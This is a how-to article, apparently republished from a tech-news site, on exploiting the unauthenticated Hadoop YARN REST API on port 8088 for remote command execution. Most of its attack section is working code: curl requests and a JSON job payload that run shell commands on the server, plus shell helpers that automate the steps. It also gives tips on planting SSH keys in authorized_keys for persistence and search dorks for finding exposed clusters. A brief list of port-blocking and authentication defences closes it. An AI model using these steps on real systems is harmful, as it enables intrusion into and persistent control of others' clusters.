

How the Hadoop Command Execution Vulnerability Works

2025-01-15 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Many readers are unsure what Hadoop command execution looks like in practice, so this article summarizes the cause of the problem and how to address it. Hopefully it helps you solve the issue.

Hadoop introduction and vulnerability principle

Hadoop is an Apache distributed system infrastructure. Users can write distributed programs that exploit the full power of a cluster for high-speed computation and storage, and Hadoop implements a distributed file system, the Hadoop Distributed File System (HDFS).

The HDFS component is highly fault tolerant: even when deployed on low-cost hardware, it provides high-throughput access to application data.

Apache YARN (short for Yet Another Resource Negotiator) is Hadoop's cluster resource management system. YARN was introduced in Hadoop 2 to improve the MapReduce implementation, but it is general-purpose and supports other distributed computing models as well.

The ApplicationMaster negotiates appropriate containers with the scheduler, tracks application status, and monitors progress. It is the process that coordinates an application's execution in the cluster: each application has its own ApplicationMaster, which negotiates resources (containers) with the ResourceManager and works with the NodeManagers to execute and monitor tasks.

After an ApplicationMaster starts, it periodically sends heartbeats to the ResourceManager to confirm its health and report the resources it needs. In the established demand model, the ApplicationMaster encapsulates its preferences and constraints in these heartbeats. In subsequent heartbeats it receives leases on containers bound to specific nodes in the cluster. Based on the containers the ResourceManager returns, the ApplicationMaster can update its execution plan to cope with resource shortfalls or surpluses; containers can be allocated and released dynamically.

Job-related commands:

1. List jobs: hadoop job -list
2. Kill a job: hadoop job -kill <job_id>
3. Show more details of a job: hadoop job -history all <output-dir>
4. Kill a task (killed tasks are not counted against failed attempts): hadoop job -kill-task <task_id>
5. Fail a task (failed tasks are counted against failed attempts): hadoop job -fail-task <task_id>

YARN command:

The YARN command invokes the bin/yarn script; running the script without any arguments prints a description of every yarn command.

Usage: yarn [--config confdir] COMMAND [--loglevel loglevel] [GENERIC_OPTIONS] [COMMAND_OPTIONS]

application usage: yarn application [options]

Run the jar file

Users can package the written YARN code into a jar file and use this command to run it:

yarn jar <jar> [mainClass] args...

RCE implementation

A Hadoop service started with root privileges will execute jobs according to the parameters in POST data that a user submits to the server's port 8088. The concrete steps are as follows:

The Applications manager on port 8088:

1. Apply for a new application by making a POST request directly with curl:

curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

The return content is similar to:

{"application-id": "application_1527144634877_20465", "maximum-resource-capability": {"memory": 16384, "vCores": 8}}
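The application id can be pulled out of this response with standard tools. A minimal sketch in POSIX shell (the helper name `extract_app_id` is my own, and pure sed is used so no jq is required):

```shell
#!/bin/sh
# Hypothetical helper (not from the original write-up): extract the
# "application-id" field from the new-application JSON response on stdin.
extract_app_id() {
  sed -n 's/.*"application-id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

# Example: pipe the curl response through the helper.
# curl -s -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application' | extract_app_id
```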

2. Construct and submit the task

Construct a JSON file, 1.json, with the following content. application-id corresponds to the id obtained above; the command tries to create a file test_1 under the /var/tmp directory.

{"am-container-spec": {"commands": {"command": "echo '111' >> /var/tmp/test_1"}}, "application-id": "application_1527144634877_20465", "application-name": "test", "application-type": "YARN"}

Then send the data directly using curl:

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json
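The two steps above can be scripted end to end. A sketch, where `build_payload` is a hypothetical helper, `TARGET` is an assumed placeholder for the vulnerable host, and the JSON layout matches the 1.json above:

```shell
#!/bin/sh
# Sketch of the two-step flow described above; names are illustrative,
# not from the original write-up.
TARGET='http://ip:8088'

# Build the submission JSON for a given application id ($1) and shell command ($2).
build_payload() {
  printf '{"am-container-spec": {"commands": {"command": "%s"}}, "application-id": "%s", "application-name": "test", "application-type": "YARN"}' "$2" "$1"
}

# Usage (commented out so the sketch itself has no side effects):
# app_id=$(curl -s -X POST "$TARGET/ws/v1/cluster/apps/new-application" \
#   | sed -n 's/.*"application-id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p')
# build_payload "$app_id" "echo '111' >> /var/tmp/test_1" > 1.json
# curl -s -i -X POST -H 'Content-Type: application/json' \
#   "$TARGET/ws/v1/cluster/apps" --data-binary @1.json
```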

This completes the attack and the command is executed: the file appears in the target directory, and the related job information is visible in the port 8088 web interface.

Tips:

1. You can verify command execution with ceye or dnslog, or write a public key into /home/user/.ssh/authorized_keys.

2. To find exposed services, search for title="All Applications" or port=50070.

However, this approach has three limitations:

1. The service must have been started with administrator privileges, since the injected command runs with the same privileges. If it was started by an ordinary user, commands that exceed that user's permissions only produce failure records: the command execution ultimately fails, while still leaving attack records that are difficult to delete.

2. If permission authentication is enabled on Hadoop's 8088 management port, the request is rejected with:

AuthorizationException: "message": "Unable to obtain user name, user not authenticated."

3. When there are two or more master+slave nodes, the NameNode submits the task to an arbitrary node according to Hadoop's distribution mechanism; so far the author has not found a way to pin the job to a specific node.

Protection suggestions

1. Project owners should block the service ports exposed to the public network (8040, 8042, 8088, 50060, 50070, etc.), or restrict access with a whitelist.

2. Add an access-authentication step to the Hadoop web manager service (8088) and authenticate incoming requests.

3. Change the default ports to prevent the services from being exploited in bulk.
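For suggestion 2, Hadoop ships an HTTP authentication filter that can be enabled in core-site.xml. A minimal sketch (the property names come from the stock Hadoop configuration; the values are illustrative, and the kerberos setting additionally needs a matching principal and keytab):

```xml
<!-- core-site.xml: enable the HTTP authentication filter for Hadoop web UIs. -->
<property>
  <name>hadoop.http.filter.initializers</name>
  <value>org.apache.hadoop.security.AuthenticationFilterInitializer</value>
</property>
<property>
  <name>hadoop.http.authentication.type</name>
  <value>kerberos</value>
</property>
<property>
  <name>hadoop.http.authentication.simple.anonymous.allowed</name>
  <value>false</value>
</property>
```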

After reading the above, have you mastered how Hadoop command execution works? If you want to learn more, you are welcome to follow the industry information channel. Thank you for reading!
